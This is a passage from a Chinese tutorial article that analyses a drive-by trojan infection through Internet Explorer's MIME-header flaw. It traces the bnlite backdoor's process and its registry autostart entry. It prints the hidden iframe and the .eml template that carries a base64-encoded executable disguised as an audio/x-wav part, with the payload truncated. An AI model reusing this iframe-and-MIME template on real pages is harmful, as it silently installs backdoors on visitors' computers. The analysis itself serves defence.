当心！浏览网页也会中木马-注册表全攻略。

49、当心！浏览网页也会中木马 

    如果我对你说浏览网页也会感染木马，你相信吗？
　　其实，这已经不是相信不相信的问题了，在半年前就有人使用这种技术来使人中招了！最近听说有人在浏览某个网站时中招，因此去那里看了看，在网页打开的过程中，鼠标奇怪的变成沙漏形状，看来的确是有程序在运行。打开计算机的任务管理器，可以看到多了一个wincfg.exe的进程。进程对应的文件在win2000下是c:\winnt\wincfg.exe，在win98下为c:\windows\wincfg.exe。运行注册表编辑器regedit，在HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\CurrentVersion\Run发现wincfg.exe，哈哈，原来它将自己登记在注册表开机启动项中，这样每次开机都会自动运行wincfg.exe！
　　注：给你下套的人可以自己设定这个木马的启动键名和注册文件名，注册文件名也就是运行时进程里的名称，因此大家看到的结果可能不相同。 
　　运行金山毒霸，报告发现“backdoor bnlite”，哦，原来是木马bnlite服务端改名为wincfg.exe。别看这个木马服务端程序不大（只有6.5K），但它的功能可不少：具有ICQ通报功能、远程删除服务端功能、设定端口和运行名称、IP报信（报告服务端所在的IP地址）、上传下载……如果你中了该木马，那么木马控制端所在完全可以通过这个木马在你的电脑上建立一个隐藏的ftp服务，这样别人就有全部权限进入你的电脑了！控制你的电脑将非常容易！
　　让我感兴趣的是，木马是如何下载到浏览了该主页的用户的计算机中、并运行起来的。在IE中点击“工具”→“Internet选项”→“安全”→“自定义安全级别”，将ActiveX相关选项全部都禁用，再浏览该网页，wincfg.exe还是下载并运行了！看来和ActiveX无关。在“自定义安全级别”中有关文件下载的选项都禁止，再浏览该网页，哈哈！这回wincfg.exe不再下载了。 
　　我们来看看wincfg.exe是如何下载到浏览者计算机上的，在该网页上点击鼠标右键，选择其中的“查看源代码”，在网页代码最后面发现了可疑的一句：
IFRAME src="wincfg.eml" width=1 height=1 
　　注意到其中的“wincfg.eml”了吗？大家都知道eml为邮件格式，网页中要eml文件干什么呢？非常可疑！再次浏览该网页，再看看任务管理器，wincfg.exe进程又回来了，原来问题就在这个文件上！既然问题在这文件上，当然想办法搞到这个文件看看了。用蚂蚁把文件下载下来，鼠标刚点上去，wincfg.exe又被执行了，真是阴魂不散啊！ 
    打开a.eml，发现其内容如下： 
From: "xxx" To: "xxx" Subject: xxxx 
Date: Tue, 7 Apr 2001 15:16:57 +800 
MIME-Version: 1.0 
Content-Type: multipart/related; 
type="multipart/alternative"; 
boundary="1" 
X-Priority: 3 
X-MSMail-Priority: Normal 
X-Unsent: 1 
--1 
Content-Type: multipart/alternative; 
boundary="2" 
--2 
Content-Type: text/html; 
charset="gb2312" 
Content-Transfer-Encoding: quoted-printable 
HTML> 
HEAD> 
/HEAD> 
BODY bgColor=3D#ffffff> 
iframe src=3Dcid:THE-CID height=3D0 width=3D0> 
/BODY> 
--2-- 
--1 
Content-Type: audio/x-wav; 
name="wincfg.exe" 
Content-Transfer-Encoding: base64 
Content-ID: 
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4
gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAIh3BDsAAAAAAAAAAOAADwELAQQUAC
AAAAAQAAAAkAAAIL0AAACgAAAAwAAAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAADQA
AAAEAAAAAA……(以下删掉一大节) 
--1 
   你看到的类似“TVqQAAMAAAAEAAAA//8AAL”这样的字符，就是wincfg.exe经过base64编码的内容。上面这些代码中，关键的是下面这一段：
Content-Type: audio/x-wav; 
name="wincfg.exe"
Content-Transfer-Encoding: base64 
Content-ID: 
　　其中，name="wincfg.exe"这一句定义了文件名称，在此为wincfg.exe。 而这一句：Content-Transfer-Encoding: base64则定义了代码格式为base64。 
 　从这句Content-ID: 开始才是代码的起步，
“TVqQAAMAAAAEAAAA//8AAL”等为wincfg.exe文件的BASE64方式编码，这个以BASE64方式编码的文件会反编译成wincfg.exe文件并运行。这就是浏览该网页会中木马的原因！到此我就明白了，其实，所谓的浏览网页会中木马，只是网页制作者利用了微软IE浏览器中存在的漏洞进行攻击的一个案例而已，说白了就是利用了错误的MIME头进行攻击。
　　1.MIME简介
　　MIME(Multipurpose Internet Mail Extentions)，一般译作“多用途的网际邮件扩充协议”。顾名思义，它可以传送多媒体文件，在一封电子邮件中附加各种格式文件一起送出。现在它已经演化成一种指定文件类型(Internet的任何形式的消息：e-mail，usenet新闻和Web)的通

[1] [2] 下一篇